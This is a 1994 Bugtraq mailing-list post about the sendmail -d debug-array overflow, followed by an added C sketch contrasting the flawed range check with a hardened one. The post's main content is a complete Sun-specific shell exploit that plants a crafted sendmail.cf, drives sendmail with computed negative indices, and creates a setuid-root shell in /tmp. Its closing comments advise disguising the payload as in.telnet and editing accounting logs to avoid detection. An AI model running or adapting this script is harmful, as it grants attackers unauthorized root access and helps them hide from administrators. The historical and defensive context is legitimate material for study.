Bugtraq mailing list archives

Re: Latest sendmail bug?


From: widnerm () hsd utc com (Michael R. Widner)
Date: 20 Jul 1994 10:17:04 -0400 (EDT)


In a previous message, Doug McLaren said:
| > Does anyone have an exploit script we can use to test yet?
| > The worst bug exploits sendmail -d and can be used to gain root
| > according to CERT.
| 
| an exploit script was posted to this list a few months back.

Um, I checked and never found said script.


The last sendmail -d hole script was posted somewhere back around March I
believe.  I've seen several different varieties, each of which has its
strong points and weaknesses as an exploit script.  The important thing to
know is that if your sendmail crashes when you pass it something like
-d387654321 then it can most likely be exploited to gain root access.

Without going into much detail, -dx.y writes y into the debug array as
array[x]=y.  Range checking is not performed properly on x, so it's possible
to pass negative integers that pass the range check.  Find a key location
before the debug array, overwrite it, and you're in business.

The problem in trying to create a generic script is that the 'key' locations
have different offsets from the debug array for every version of sendmail.
Sometimes they're easy to locate if you can get a core, but sometimes it is
tough to get a core w/o already being root.  Also, sometimes a core tells
you nothing.

The following script is Sun specific, and patches are now available for
all versions of Sun sendmail.  The script creates a suid root owned copy
of /bin/sh and places it in /tmp.  If you're hacking solaris, I'd suggest
you choose some program other than /bin/sh.

For the curious and paranoid, the uuencoded script is a compiled, compressed,
and uuencoded version of the following c prog, compiled under sunos.
main()
{
        setuid(0);
        chown("/tmp/newsh", 0, 0);
        chmod("/tmp/newsh", 04755);
        exit(0);
}

I put it in this way because solaris lacks a bundled compiler.

Of course, I may be lying.  It may really be a uuencoded program that does
main() { unlink("/");}, but you'll just have to trust me.

I should point out that Sun sendmail is in no way unique in its vulnerability
to this hole.

It's also worth noting, for Solaris administrators and hackers, that the
normal Solaris patch procedure will leave the old (pre-patched) versions of
sendmail in their broken and SUID state under /var/sadm/patch.  This should
be fixed, if you haven't done it already.

--
Michael R. Widner    <widnerm () hsd utc com>

---------------------------
#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array.  As it, it will work with the 8 versions of sun sendmail
# that I have access to.  Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE:  This is a Sun specific script.  Don't expect it to work with
#        any non-sun sendmail.
# -Michael R. Widner (atreus)        3/25/94
#
# usage:  smdhole [/path/to/suid/sendmail]
#

# add /usr/ucb to path so solaris can find `whoami` (4/18/94)
path=$path:/usr/ucb

if [ $1x = x ]; then
        sendmail=/usr/lib/sendmail
else
        echo "Trying to abuse $1."
        sendmail=$1
fi

sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`

# prefix and suffix for -1 as unsigned integer.  Actually, this is
# off by two.  you figure out why.
prefix=42949
suffix=67297

case $sm_size in
        132064)
                n1=${prefix}52864
                n2=${prefix}52865
                n3=${prefix}52866
                echo Patched solaris w/o mx.
                ;;
        134752) # ug! dropped a 0 before.  fixed 4/18/94
                n1=${prefix}01656
                n2=${prefix}01657
                n3=${prefix}01658
                echo Patched solaris sendmail.mx
                ;;
        130860)
                n1=${prefix}53016
                n2=${prefix}53017
                n3=${prefix}53018
                echo Un-patched solaris w/o mx.
                ;;
        133548) # ug! dropped a 0 before.  fixed 4/18/94
                n1=${prefix}01808
                n2=${prefix}01809
                n3=${prefix}01810
                echo Un-patched solaris sendmail.mx
                ;;
        139264)
                n1=${prefix}49609
                n2=${prefix}49610
                n3=${prefix}49611
                echo Sun 4.1.3 sendmail - could be either of two versions
                n4=${prefix}49265
                n5=${prefix}49266
                n6=${prefix}49267
                ;;
        155648)
                n1=${prefix}46953
                n2=${prefix}46954
                n3=${prefix}46955
                echo Sun 4.1.3 sendmail.mx - could be either of two versions
                n4=${prefix}46609
                n5=${prefix}46610
                n6=${prefix}46611
                ;;
        *)
                echo "I don't know what version of sendmail $sendmail is."
                echo -n "Look for other versions of sendmail[.mx] on the "
                echo "system and re-run this as:"
                echo "     $0 /path/to/another/suid/sendmail"
                echo
                echo "Let me see if I can suggest anything..."
                find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001 -ls 2>/dev/null
                exit 1
                ;;
        esac

cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g  \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp

H?F?From: nobody

Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog,  P=/tmp/in.telnet,   F=lsDFMeuP,  S=10, R=20, A=sh -c \$u

S0
R\$+                    \$#local \$:\$1                 just rewrite
EOM

cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/in.telnet.Z
chmod 755 /tmp/in.telnet

mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail

cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh

$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami`  <<EOF

test
EOF

if [ -x /tmp/newsh ]; then
        echo "Had the right offset for sendmail.cf.  Here's the result:"
else
        echo "Looks like I had the wrong sendmail.cf offset.  Fuckers."
        if [ ${n4}x = x ]; then
                echo "This version isn't what I thought it was."
                echo "Look for other suid sendmails and try this on them."
        else
                echo "I'm taking another stab with a different offset."
$sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF

test
EOF
                echo "Here's the result:"
        fi
fi

rm /tmp/in.telnet
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh

exit

# I'm calling this in.telnet for one reason.  It shows up in the acct logs
# as being run by root.  It will attract less attention if it's something
# normally run by root.  An alert admin will catch is anyway, because
# in.telnet is normally not associated with a tty.  The obvious fix, if you
# want to go undetected, would be to modify the acct files once you've
# become root.
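The flaw the post describes, as an added example that is not part of the original message or of sendmail's source: a -dX.Y index accumulated into a 32-bit value and then treated as a signed int goes negative for very large X, and a check that only tests the upper bound lets it through. tt_index_vuln() models that flawed check (it only computes the index, it never writes with it); tt_index_fixed() and tt_set_fixed() show the check a maintainer would want instead. TT_SIZE and the tt_vect array are assumed placeholders, not sendmail's real values.

```c
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

#define TT_SIZE 100           /* assumed debug-array size, a placeholder */
static int tt_vect[TT_SIZE];  /* stand-in for the debug array */

/* Flawed check modelled on the post: digits accumulate into a 32-bit
 * unsigned value that is then treated as a signed int, so anything above
 * 2^31-1 turns negative, and the only test is against the upper bound.
 * Returns 1 if the check accepts the index (stored in *idx), else 0. */
int tt_index_vuln(const char *s, int *idx)
{
    unsigned int v = 0;                    /* assumes 32-bit int */
    while (isdigit((unsigned char)*s))
        v = v * 10u + (unsigned int)(*s++ - '0');
    *idx = (int)v;                         /* 4294952864 becomes -14432 */
    return *idx < TT_SIZE;                 /* negative indexes slip through */
}

/* Hardened check: digits only, detect overflow, require 0 <= idx < TT_SIZE,
 * and insist the number ends at '.' or at end of string. */
int tt_index_fixed(const char *s, int *idx)
{
    char *end;
    if (!isdigit((unsigned char)*s))       /* rejects "-5", " 5", "" */
        return 0;
    errno = 0;
    unsigned long v = strtoul(s, &end, 10);
    if (*end != '\0' && *end != '.')
        return 0;
    if (errno == ERANGE || v >= TT_SIZE)
        return 0;
    *idx = (int)v;
    return 1;
}

/* Apply one "X.Y" flag using the hardened check; writes only inside tt_vect.
 * Returns the stored level, or -1 if the flag was rejected. */
int tt_set_fixed(const char *spec)
{
    int idx;
    if (!tt_index_fixed(spec, &idx))
        return -1;
    const char *dot = strchr(spec, '.');
    int level = dot ? atoi(dot + 1) : 1;   /* level defaults to 1 without ".Y" */
    if (level < 0 || level > 255)
        return -1;
    tt_vect[idx] = level;
    return level;
}
```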
